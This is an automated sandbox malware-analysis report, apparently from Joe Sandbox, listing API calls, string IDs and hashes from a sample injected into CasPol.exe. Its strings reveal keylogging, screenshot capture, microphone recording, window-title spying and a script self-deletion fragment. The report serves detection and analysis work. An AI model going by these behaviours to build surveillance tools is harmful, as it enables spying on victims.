  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
APIs
• EnumDisplayMonitors.USER32(00000000,00000000,0041870C,00000000), ref: 00418632
• EnumDisplayDevicesW.USER32(?), ref: 00418662
• EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186D7
• EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186F4
Similarity
• API ID: DisplayEnum$Devices$Monitors
Similarity
• API ID: SystemTimes$Sleep__aulldiv
APIs
  • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
  • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
  • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
• CloseHandle.KERNEL32(00000000), ref: 0041B61C
Similarity
• API ID: File$CloseCreateHandlePointerWrite
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
  • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
  • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
• _UnwindNestedFrames.LIBCMT ref: 00438134
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
• CallCatchBlock.LIBVCRUNTIME ref: 0043816D
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00414BBD,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
• GetLastError.KERNEL32(?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3177248105-0
                                                                                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                  • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                  • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3177248105-0
                                                                                                                  • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                  • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4116985748-0
                                                                                                                  • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                  • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                  • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                  • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                  APIs
                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                  • String ID: pow
                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                  • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                  • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                                                                                                  • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                  • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memcmp
                                                                                                                  • String ID: 4[G$4[G
                                                                                                                  • API String ID: 2931989736-4028565467
                                                                                                                  • Opcode ID: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                  • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                  • Opcode Fuzzy Hash: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                  • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                  • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 546120528-661517699
                                                                                                                  • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                  • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                  • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                  • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Info
                                                                                                                  • String ID: $vD
                                                                                                                  • API String ID: 1807457897-3636070802
                                                                                                                  • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                  • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                  • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                  • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Info
                                                                                                                  • String ID: $h(RA/
                                                                                                                  • API String ID: 1807457897-799253340
                                                                                                                  • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                  • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                  • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                  • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                  APIs
                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C18
                                                                                                                    • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C65
                                                                                                                    • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                    • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                  • String ID: image/jpeg
                                                                                                                  • API String ID: 1291196975-3785015651
                                                                                                                  • Opcode ID: 203489c16dbcee2c70a941053242b98b65a57a30b46d0c0344179c2238acd4ed
                                                                                                                  • Instruction ID: 3c33996df4896106dd3ee16a81609d02114e1f450a3ece369daacccd15328daf
                                                                                                                  • Opcode Fuzzy Hash: 203489c16dbcee2c70a941053242b98b65a57a30b46d0c0344179c2238acd4ed
                                                                                                                  • Instruction Fuzzy Hash: 72315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                  APIs
                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509C9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 0-711371036
                                                                                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                  • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                  • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100098B1
• GetLastError.KERNEL32 ref: 100098DA
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: h(RA/
• API String ID: 442123175-661517699
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100097C3
• GetLastError.KERNEL32 ref: 100097EC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: h(RA/
• API String ID: 442123175-661517699
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417D04
  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
• SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D29
  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/png
• API String ID: 1291196975-2966254431
APIs
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 004049E5
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 10005CA5
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID: h(RA/
• API String ID: 2279764990-661517699
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10002B4F
• ___raise_securityfailure.LIBCMT ref: 10002C36
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: h(RA/
• API String ID: 3761405300-661517699
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx$h(RA/
• API String ID: 2568140703-254023721
• Opcode ID: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
• Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
• Opcode Fuzzy Hash: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
• Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
APIs
• waveInPrepareHeader.WINMM(00F45390,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(00F45390,00000020,?,00000000,00401913), ref: 0040175D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: T=G
• API String ID: 2315374483-379896819
• Opcode ID: b5a1dd24f47cf6807038c428b2f4b185eaaf619d090bdcfa74a6be548d705e4e
• Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
• Opcode Fuzzy Hash: b5a1dd24f47cf6807038c428b2f4b185eaaf619d090bdcfa74a6be548d705e4e
• Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
APIs
• IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$z=D
• API String ID: 1901932003-2791046955
• Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
• Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
• Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
• Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: T=G$T=G
• API String ID: 3519838083-3732185208
• Opcode ID: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
• Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
• Opcode Fuzzy Hash: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
